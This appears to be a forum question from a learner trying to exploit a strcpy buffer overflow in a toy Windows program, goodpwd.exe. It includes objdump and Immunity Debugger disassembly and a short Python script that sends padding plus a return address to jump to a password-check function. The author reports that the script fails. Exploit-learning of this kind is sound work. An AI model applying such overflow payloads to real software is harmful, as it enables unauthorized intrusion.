I’m facing an issue when trying to exploit the buffer overflow of the goodpwd.exe.
This is my environment:
- Virtual box with windows7
- MSYS2 32bit
- Immunity debugger
My objdump output:
004015ec <__Z11bf_overflowPc>:
4015ec: 55 push ebp
4015ed: 89 e5 mov ebp,esp
4015ef: 83 ec 28 sub esp,0x28
4015f2: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]
4015f5: 89 44 24 04 mov DWORD PTR [esp+0x4],eax
4015f9: 8d 45 ee lea eax,[ebp-0x12]
4015fc: 89 04 24 mov DWORD PTR [esp],eax
4015ff: e8 e4 6b 00 00 call 4081e8 <_strcpy>
401604: b8 00 00 00 00 mov eax,0x0
401609: c9 leave
40160a: c3 ret
0040160b <__Z13good_passwordv>:
40160b: 55 push ebp
40160c: 89 e5 mov ebp,esp
40160e: 83 ec 18 sub esp,0x18
401611: c7 04 24 44 a0 40 00 mov DWORD PTR [esp],0x40a044
401618: e8 93 ff ff ff call 4015b0 <__ZL6printfPKcz>
40161d: c7 04 24 60 a0 40 00 mov DWORD PTR [esp],0x40a060
401624: e8 87 ff ff ff call 4015b0 <__ZL6printfPKcz>
401629: 90 nop
40162a: c9 leave
40162b: c3 ret
0040162c <_main>:
40162c: 55 push ebp
40162d: 89 e5 mov ebp,esp
40162f: 83 e4 f0 and esp,0xfffffff0
401632: 83 ec 20 sub esp,0x20
401635: e8 66 01 00 00 call 4017a0 <___main>
40163a: c7 44 24 1c 00 00 00 mov DWORD PTR [esp+0x1c],0x0
401641: 00
401642: c7 04 24 81 a0 40 00 mov DWORD PTR [esp],0x40a081
401649: e8 62 ff ff ff call 4015b0 <__ZL6printfPKcz>
40164e: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]
401651: 83 c0 04 add eax,0x4
401654: 8b 00 mov eax,DWORD PTR [eax]
401656: 89 04 24 mov DWORD PTR [esp],eax
401659: e8 8e ff ff ff call 4015ec <__Z11bf_overflowPc>
40165e: 83 7c 24 1c 01 cmp DWORD PTR [esp+0x1c],0x1
401663: 75 07 jne 40166c <_main+0x40>
401665: e8 a1 ff ff ff call 40160b <__Z13good_passwordv>
40166a: eb 0c jmp 401678 <_main+0x4c>
40166c: c7 04 24 9d a0 40 00 mov DWORD PTR [esp],0x40a09d
401673: e8 38 ff ff ff call 4015b0 <__ZL6printfPKcz>
401678: c7 04 24 b2 a0 40 00 mov DWORD PTR [esp],0x40a0b2
40167f: e8 2c ff ff ff call 4015b0 <__ZL6printfPKcz>
401684: b8 00 00 00 00 mov eax,0x0
401689: c9 leave
40168a: c3
Immunity debugger
00EE15EC /$ 55 PUSH EBP
00EE15ED |. 89E5 MOV EBP,ESP
00EE15EF |. 83EC 28 SUB ESP,28
00EE15F2 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
00EE15F5 |. 894424 04 MOV DWORD PTR SS:[ESP+4],EAX ; |
00EE15F9 |. 8D45 EE LEA EAX,DWORD PTR SS:[EBP-12] ; |
00EE15FC |. 890424 MOV DWORD PTR SS:[ESP],EAX ; |
00EE15FF |. E8 E46B0000 CALL <JMP.&msvcrt.strcpy> ; \strcpy
00EE1604 |. B8 00000000 MOV EAX,0
00EE1609 |. C9 LEAVE
00EE160A \. C3 RETN
00EE160B /$ 55 PUSH EBP
00EE160C |. 89E5 MOV EBP,ESP
00EE160E |. 83EC 18 SUB ESP,18
00EE1611 |. C70424 44A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA044 ; ASCII "Valid password supplied
"
00EE1618 |. E8 93FFFFFF CALL goodpwd.00EE15B0
00EE161D |. C70424 60A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA060 ; ASCII "This is good_password function
"
00EE1624 |. E8 87FFFFFF CALL goodpwd.00EE15B0
00EE1629 |. 90 NOP
00EE162A |. C9 LEAVE
00EE162B \. C3 RETN
00EE162C /$ 55 PUSH EBP
00EE162D |. 89E5 MOV EBP,ESP
00EE162F |. 83E4 F0 AND ESP,FFFFFFF0
00EE1632 |. 83EC 20 SUB ESP,20
00EE1635 |. E8 66010000 CALL goodpwd.00EE17A0
00EE163A |. C74424 1C 0000>MOV DWORD PTR SS:[ESP+1C],0
00EE1642 |. C70424 81A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA081 ; ASCII "You are in goodpwd.exe now
"
00EE1649 |. E8 62FFFFFF CALL goodpwd.00EE15B0
00EE164E |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
00EE1651 |. 83C0 04 ADD EAX,4
00EE1654 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
00EE1656 |. 890424 MOV DWORD PTR SS:[ESP],EAX
00EE1659 |. E8 8EFFFFFF CALL goodpwd.00EE15EC
00EE165E |. 837C24 1C 01 CMP DWORD PTR SS:[ESP+1C],1
00EE1663 |. 75 07 JNZ SHORT goodpwd.00EE166C
00EE1665 |. E8 A1FFFFFF CALL goodpwd.00EE160B
00EE166A |. EB 0C JMP SHORT goodpwd.00EE1678
00EE166C |> C70424 9DA0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA09D ; ASCII "Invalid Password!!!
"
00EE1673 |. E8 38FFFFFF CALL goodpwd.00EE15B0
00EE1678 |> C70424 B2A0EE0>MOV DWORD PTR SS:[ESP],goodpwd.00EEA0B2 ; ASCII "Quitting sample1.exe
"
00EE167F |. E8 2CFFFFFF CALL goodpwd.00EE15B0
00EE1684 |. B8 00000000 MOV EAX,0
00EE1689 |. C9 LEAVE
00EE168A \. C3 RETN
Has we can see already the addresses differ.
Taking in consideration the objdump addresses and using a python script like the one below It never works, it seems I can’t jump correctly to the function goodpwd.
from importlib.resources import path
import os
import sys
payload = "\x41"*22
payload += "\x0b\x16\x40"
command = "goodpwd.exe %s" %(payload)
print(path)
print (command)
os.system(command)
I don’t know why immunity debugger assigns different addresses in comparison with the objdump, but the python script is not working. when using the helper.cpp and changing the address to the one mention on the objdump it also fails.
Any suggestion, is this related to be using a virtual environment, or MSYS2 instead of using mingw compiler?
Thank you